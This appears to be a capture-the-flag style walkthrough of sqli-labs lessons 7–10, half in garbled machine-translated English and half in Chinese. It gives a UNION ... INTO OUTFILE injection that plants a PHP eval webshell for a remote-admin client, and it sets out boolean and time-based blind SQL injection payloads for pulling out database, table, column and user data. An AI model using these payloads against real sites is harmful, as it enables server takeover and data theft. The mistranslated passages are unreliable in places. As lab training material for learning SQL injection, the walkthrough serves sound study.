EDITORIAL:
First of all need to change the database user privileges for operating after us.
First, the mysql command line with show variables like '% secure%'; view the current value of the secure-file-priv, if the display is NULL, you need to open the C: \ phpstudy \ PHPTutorial \ MySQL \ my.ini file, in which add that: secure_file_priv = "/".
Restart phpstudy permission to change overnight
1.load_file (file_name) file export function:
Load_file (file_name): read the file and return the contents of the file as a character string.
But there must have permission to read the file and must be fully readable, otherwise, it returns false. (This is also the reason for the above modification privileges)
2.select ....... into outfile 'file_name' :
You can be selected row written to a file. The same must have read and write permissions files can execute this statement.
For example: select version () into outfile "c: \\ phpstudy \\ 111.txt" \\ here and windows in / similar meaning. This statement is executed successfully put the database version written 111.txt file.
And when we injected the contents into a word Trojan will selec: with the Chinese choppers software uses <php @eval ($ _ post [ "mima"])??>.
ps: contents of the select word here is not limited to upload Trojans can also upload a lot of other things.
3. Trojan sentence:
<? Php @eval ($ _ POST [ "crow"]);?> This is a php version, which is the password crow.
Sentence Trojans mostly with Chinese chopper use
Into the title:
Look at the source code is found id ')) package, the principles and similarly constructed before the statement on OK
Execute the statement:
?id=1')) union select 1,2,'<?php @eval($_POST["mm"]);?>' into outfile "C:\\phpStudy\\WWW\\sqli-labs-master\\Less-7\\111.php" %23
It should be noted that several points, first of all through the php file into outfile statement generated php file with the same name do not appear in the same directory
About Trojan sentence: '<?? Php @eval ($ _ POST [ "mm"]);>' Note that there are spaces between php and @eval, many basic questions connected with a kitchen knife because a word is something wrong?.
Despite being given, but 111.php file has been imported content appeared.
After connecting Chinese kitchen knife, right blank space select Add, enter the following page
shell path attention to the following diagram format, rather than a local absolute path, my back mm corresponding password, which is the sentence in brackets of the two letters.
After a successful connection is as follows:
less-8:
1. Boolean Blinds:
id or use 'wrapped a closed configuration statements like single quotes.
Prior to such use had left (), ascii () + substr () guess the solution, not repeat them here.
The following describes a method of injection delay.
2. Delay Injection: through if the sleep function and composition (page quickly returns true, execution will return flase sleep ()) according to the page length of the reaction ()
if (condition, a, b): If the condition returns ture perform a; b otherwise, execute
sleep (a): Wait a sec Back to respond.
For example:? Perform id = 1 'and if (length (datatbase ()) = 8,1, sleep (10))% 23
当数据库长度为8时页面很快出现反应,不为8时会延时10秒返回页面反应。
同理 执行?id=1' and if(ascii(substr(database(),1,1))>110,1,sleep(10)) %23
与上面类似,比较费时,个人感觉逻辑上不如利用二分法布尔盲注快。
下面附上部分步骤:
数据库长度为8位
猜解数据库名
可以利用and left(database(),1)>'a' 猜解第一位
and left(database(),2)>'sa' 猜解前2位
left(str,num) 截取str字符串前num位(从左往右)
2.判断表名
and ascii(substr((select table_name from infomation_schema.tables where tables_schema=database() limit 0,1),1,1))
判断列名1:ascii+substr
and ascii(substr((select column_name from information_schema.columns where table_name=security.users limit 0,1),1,1))>97 %23
判断列名2:regexp
and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^username' limit 0,1) %23
3.1利用ascii和substr破解列中的内容:
?id=1' and ascii(substr((select username from security.users limit 0,1),1,1))=68 %23
less 9-10:
与上面不同,不管如何输入返回都是You are in ....
所以只能使用延时注入。
less 9 的id是被 ' 包裹
less 10 是 " 包裹 注意闭合语句即可 方法就是上面所说的延时注入。